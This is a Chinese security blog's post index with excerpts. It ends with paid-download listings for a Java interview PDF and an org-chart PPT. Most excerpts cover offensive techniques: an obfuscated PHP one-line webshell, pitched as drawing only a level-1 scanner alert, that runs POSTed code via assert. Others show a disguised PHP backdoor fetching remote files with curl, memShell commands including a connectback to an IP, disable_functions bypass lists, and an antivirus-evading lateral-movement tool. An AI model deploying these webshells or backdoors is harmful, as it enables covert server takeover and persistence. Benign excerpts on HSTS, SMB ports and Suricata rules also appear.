自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

XXR_Beta的博客

为了好好偷懒,一定要非常努力。

  • 博客(17)
  • 资源 (2)
  • 收藏
  • 关注

转载 转载(一):浮动IP(VIP)的简述

原文链接:https://blog.csdn.net/readiay/article/details/53538085

2021-01-05 16:12:24 743

原创 随记(十一):记录一个1级webshell

PHP一句话,谈不上免杀,D盾只报1级,安全狗没测试过,只是用了简单的strtr()函数进行优化,不喜勿喷。<?php $a = strtr('azxcvt','zxcv','sser'); $a($_POST['password']);?>

2020-12-23 17:53:43 228

原创 利用漏网之鱼Bypass disable_functions

这种Bypass思路就是查看执行命令的函数是否被禁全。PHP中执行命令的函数有:system, shell_exec, passthru, exec,popen, proc_open, pcntl_execmail, putenv, apache_setenv, mb_send_mail, assert, dl, set_time_limitignore_user_abort, symlink, link, map_open, imap_open, imap_mailini_set, ini_al

2020-12-22 15:56:49 202

原创 利用Linux LD_PRELOAD加载自定义的动态链接库Bypass disable_functions

利用Linux LD_PRELOAD加载自定义的动态链接库Bypass disable_functions0x01 利用mail函数劫持getuid() 利用条件 利用原理 利用方法0x02 劫持启动函数 利用条件 利用原理 利用方法事先声明,本文摘自 “酒仙桥六号部队” 的公众号 “奇怪的PHP知识增加了” 文章。本人本着学习的态度,跟着作者的思路自己操作了一遍,发现其中的缺陷,因此作此记录。如有冒犯/侵权,请私信,本人立马进行删除。原文链接:https://mp.weixin.qq.com/s/Bi

2020-12-22 11:30:09 375

原创 随记(十):记录有趣的Github项目

一款优秀的webshell项目:https://github.com/tennc/webshell红队技术与技巧:https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques其文档官网:https://www.ired.team/唉,学不完~学不完,后续看到优秀的Github项目也会记录于此。...

2020-12-17 15:41:37 139

原创 利用Windows COM组件Bypass disable_functions

利用Windows COM组件Bypass disable_functions0x01 上传com_rce.php文件至服务器0x02 远程命令执行关于Windows COM组件,这里不作阐述,直接展示我的利用姿势。 利用条件:php.ini中com.allow_dcom的值为true且extension=php_com_dotnet.dll; (Tips1:PHP 7版本开始要自己添加扩展extension=php_com_dotnet.dll)(Tips2:com.allow_dcom的值默

2020-12-15 15:19:34 836

原创 随记(九):记录Fastjson远程命令执行流程

记录Fastjson远程命令执行流程0x01 Fastjson远程命令执行流程0x02 Fastjson漏洞利用流程简述摘自:ZE0安全实验室的一篇分析文章 - 传送门我觉得这个解释非常好,所以借此文记录下来。如有冒犯,私信我立即删除。同时还总结了漏洞利用流程的简述,像这个问题,在面试过程中也常常会被提及到,鄙人就有幸被提问过一次,模模糊糊的答出个大概来。0x01 Fastjson远程命令执行流程主机A:存在fastjson反序列化漏洞的主机主机C:为RMI/LDAP服务主机B:为构造的恶意

2020-12-08 03:57:38 594 1

原创 随记(八):CentOS 7安装Maven(亲测有效)

因为安装Maven的时候踩了坑,所以这里简单记录一下正确的安装方式。## 1.安装JAVA环境[root@root ~]# yum install java-1.8.0-openjdk-devel.x86_64## 2.查看安装位置(我的查看结果为java-1.8.0-openjdk-1.8.0.272.b10-1.el7_9.x86_64)[root@root jvm]# cd /usr/lib/jvm/## 这里为了避免有小白纠结这目录位置,先将其切换至root目录[root@root

2020-12-06 16:43:37 215

原创 随记(七):Jboss漏洞检测利用工具

Jboss漏洞检测利用工具0x01 安装方法0x02 使用方法Jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。工具下载:https://github.com/joaomatosf/jexboss此工具除了可以对Jboss框架进行漏洞检测,还可以对其它Java平台、框架、应用等反序列化漏洞进行检测。0x01 安装方法## 克隆项目至本地

2020-12-06 14:58:46 4402

原创 随记(六):Suricata IDS 开源入侵检测系统

记录两个Github项目:https://github.com/OISF/suricatahttps://github.com/suricata-rules/suricata-rulesSuricata是一个优秀的开源入侵检测系统,此项目记录安全运营人员提取的高质量Suricata IDS规则。Suricata IDS Rules 用来检测红队渗透/恶意行为等,支持检测CobaltStrike/MSF/Empire/DNS隧道/Weevely/菜刀/冰蝎/挖矿/反弹shell/ICMP隧道等。官网

2020-12-05 22:12:05 1116

原创 随记(五):一个简单又较隐蔽的PHP后门

话不多说,直接上代码(backdoor.php)<?phpfunction adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto

2020-12-05 21:46:03 556 1

原创 随记(四):简述HSTS协议

简述HSTS协议HSTS协议概要HSTS作用HSTS配置方法HSTS协议概要HSTS意为严格传输安全协议(英语:HTTP Strict Transport Security),其最为核心的是一个HTTP响应头(HTTP Response Header),正如图所示:HSTS Header的语法如下:Strict-Transport-Security: max-age=XXX; includeSubDomains; preloadmax-age是必填参数,是一个以秒为单位的数值,它代表着HST

2020-11-30 02:16:12 584

原创 随记(三):一次渗透测试利用UDF提权思路执行命令的姿势

一次渗透测试中已上传WebShell,并且是system权限,但是在蚁剑终端输入命令时都没有回显,经过验证,的确是命令执行失败,原因未知。于是尝试用MySQL的sys_exec()或sys_eval()来执行命令,本文旨在随记这一渗透场景所用到的姿势及手法,最后这一渗透思路是失败告捷的。(涉及到UDF提权的姿势)我遇到的MySQL版本为5.7.22,因为版本大于5.1,udf.dll文件必须放置在MySQL安装目录的lib\plugin文件夹,没有此文件夹就手动创建。0x01 解码sqlmap自带的ud

2020-11-24 16:30:31 364

原创 随记(二):Java 内存Webshell

项目地址:https://github.com/rebeyond/memShell注入进Java WEB服务器内存中的WebShellanyurl?pass_the_world=pass //show this help page.anyurl?pass_the_world=pass&model=exec&cmd=whoami //run os command.anyurl?pass_the_world=pass&model=connectback&ip=8.8

2020-11-19 16:37:38 390 1

原创 学习推荐:超全面SQL注入学习文档

学习推荐:超全面SQL注入学习文档MySQL注入学习MSSQL注入学习Oracle注入学习附加功能本篇文章旨在推荐一个超全面的SQL注入学习网站,要是我刚入门的时候知道就好了[可惜]传送门:https://websec.ca/kb/sql_injection#文档优点:知识点细分清楚、简单明了、内容重点突出文档缺点:全英文描述个人建议:使用谷歌浏览器自动翻译MySQL注入学习MySQL数据库的基础知识、数据库特性,如何测试注入、如何测试数据库版本、如何获取数据、如何绕WAF等都有提及,笔者

2020-07-26 18:07:10 316

原创 免杀横向移动工具WMIHACKER

免杀横向移动工具WMIHACKER交互式Shell命令执行文件上传文件下载免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。其通过135端口进行命令执行,执行的结果读取以及无需445端口进行文件传输。此工具利用的前提条件是: 获取到目标主机的账户密码可能会有人问既然我都拿到主机的账号密码,我远程直接登录不香吗?那远程桌面连接是不是需要开

2020-07-04 11:57:45 1910

原创 在Windows中使用TCP端口139和445

Windows中使用TCP端口139和445139端口和445端口的作用139端口与445端口的区别关闭139端口和445端口的方法Microsoft在Windows 2000中引入了TCP端口445,并且在Windows 10和Windows Server 2019中仍在使用。我将解释该端口的作用以及与Windows安全性的关系。同时,我还将说明如何禁用旧的TCP端口139。139端口和445端口的作用详述139端口,那必须提NBT协议(即Net Bios Over TCP/IP),其属于SMB(S

2020-06-30 11:43:51 3385

交付服务部组织架构.pptx

交付服务部组织架构,交付/运维架构

2020-12-18

JAVA专栏-面试高频题目汇总.pdf

Java专栏特推面试高频题目汇总,集合近些年主流核心技术知识点以及高频面试题目,避免在面试过程中踩坑,同时弥补核心知识点的空缺,打好稳定的根基。

2020-07-28

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除